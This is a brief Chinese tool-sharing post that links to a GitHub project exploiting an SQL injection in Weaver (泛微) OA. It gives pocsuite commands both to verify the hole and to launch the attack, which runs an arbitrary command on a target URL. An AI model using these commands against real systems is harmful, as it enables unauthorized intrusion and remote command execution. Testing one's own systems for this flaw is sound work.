泛微OA某版本的SQL插入漏洞

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/Wrin9/weaverOA_sql_injection

简介

POC: PS:url结尾不能有[/],例如:http://127.0.0.1:8080,不能为http://127.0.0.1:8080/

Url ending cannot have [/], for example, http://127.0.0.1:8080, not for http://127.0.0.1:8080/

pocsuite -r weaverOA_sql_injection_POC_EXP.py -u url --verify

160861695-53c75697-6b88-41fb-bcc7-c1a49c8e2dec.png

 

EXP:pocsuite -r weaverOA_sql_injection_POC_EXP.py -u url --attack --command "[command]"

PS:url结尾不能有[/],例如:http://127.0.0.1:8080,不能为http://127.0.0.1:8080/

Url ending cannot have [/], for example, http://127.0.0.1:8080, not for http://127.0.0.1:8080/

160862217-45fe5a02-d6ab-4731-adb1-8b20ebcf2130.png

 

标签:工具分享, 泛微OA漏洞